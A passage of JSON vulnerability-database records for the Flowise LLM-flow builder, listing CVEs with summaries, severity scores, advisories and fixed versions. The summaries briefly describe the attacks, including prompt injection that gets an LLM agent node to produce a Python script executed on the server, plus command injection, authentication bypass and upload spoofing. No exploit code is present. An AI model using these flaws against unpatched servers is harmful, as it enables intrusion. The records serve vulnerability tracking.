            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gvpx-4wkw-43cz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81063?format=api",
            "vulnerability_id": "VCID-hkfs-v3bp-kbh5",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41265",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.56326",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41265"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41265",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41265"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v38x-c887-992f",
                    "reference_id": "GHSA-v38x-c887-992f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v38x-c887-992f"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f",
                    "reference_id": "GHSA-v38x-c887-992f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:16:20Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41265",
                "GHSA-v38x-c887-992f"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkfs-v3bp-kbh5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80659?format=api",
            "vulnerability_id": "VCID-j5hh-haj2-qydg",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41137",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00422",
                            "scoring_system": "epss",
                            "scoring_elements": "0.62518",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41137"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41137",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41137"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9wc7-mj3f-74xv",
                    "reference_id": "GHSA-9wc7-mj3f-74xv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9wc7-mj3f-74xv"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv",
                    "reference_id": "GHSA-9wc7-mj3f-74xv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:20:09Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41137",
                "GHSA-9wc7-mj3f-74xv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j5hh-haj2-qydg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66470?format=api",
            "vulnerability_id": "VCID-jcze-eg2c-mkcf",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30824",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.21588",
                            "scoring_system": "epss",
                            "scoring_elements": "0.9585",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30824"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30824",
                    "reference_id": "CVE-2026-30824",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30824"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
                    "reference_id": "flowise%403.0.13",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5f53-522j-j454",
                    "reference_id": "GHSA-5f53-522j-j454",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5f53-522j-j454"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454",
                    "reference_id": "GHSA-5f53-522j-j454",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-30824",
                "GHSA-5f53-522j-j454"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jcze-eg2c-mkcf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212288?format=api",
            "vulnerability_id": "VCID-jmps-anck-eqdt",
            "summary": "Flowise is vulnerable to arbitrary file exposure through its ReadFileTool",
            "references": [
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913",
                    "reference_id": "CVE-2025-61913",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j44m-5v8f-gc9c",
                    "reference_id": "GHSA-j44m-5v8f-gc9c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j44m-5v8f-gc9c"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c",
                    "reference_id": "GHSA-j44m-5v8f-gc9c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj",
                    "reference_id": "GHSA-jv9m-vf54-chjj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api",
                    "purl": "pkg:npm/flowise@3.0.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8"
                }
            ],
            "aliases": [
                "GHSA-j44m-5v8f-gc9c"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jmps-anck-eqdt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66502?format=api",
            "vulnerability_id": "VCID-k579-xd81-hqdu",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the /api/v1/attachments/:chatflowId/:chatId endpoint is listed in WHITELIST_URLS, allowing unauthenticated access to the file upload API. While the server validates uploads based on the MIME types defined in chatbotConfig.fullFileUpload.allowedUploadFileTypes, it implicitly trusts the client-provided Content-Type header (file.mimetype) without verifying the file's actual content (magic bytes) or extension (file.originalname). Consequently, an attacker can bypass this restriction by spoofing the Content-Type as a permitted type (e.g., application/pdf) while uploading malicious scripts or arbitrary files. Once uploaded via addArrayFilesToStorage, these files persist in backend storage (S3, GCS, or local disk). This vulnerability serves as a critical entry point that, when chained with other features like static hosting or file retrieval, can lead to Stored XSS, malicious file hosting, or Remote Code Execution (RCE). This issue has been patched in version 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30821",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00271",
                            "scoring_system": "epss",
                            "scoring_elements": "0.50812",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30821"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30821",
                    "reference_id": "CVE-2026-30821",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30821"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
                    "reference_id": "flowise%403.0.13",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j8g8-j7fc-43v6",
                    "reference_id": "GHSA-j8g8-j7fc-43v6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j8g8-j7fc-43v6"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6",
                    "reference_id": "GHSA-j8g8-j7fc-43v6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-30821",
                "GHSA-j8g8-j7fc-43v6"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k579-xd81-hqdu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212768?format=api",
            "vulnerability_id": "VCID-ksmv-s6c9-t7ap",
            "summary": "Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint",
            "references": [
                {
                    "reference_url": "https://github.com/advisories/GHSA-jc5m-wrp2-qq38",
                    "reference_id": "GHSA-jc5m-wrp2-qq38",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jc5m-wrp2-qq38"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38",
                    "reference_id": "GHSA-jc5m-wrp2-qq38",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "GHSA-jc5m-wrp2-qq38"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ksmv-s6c9-t7ap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66643?format=api",
            "vulnerability_id": "VCID-m3j3-4u39-euht",
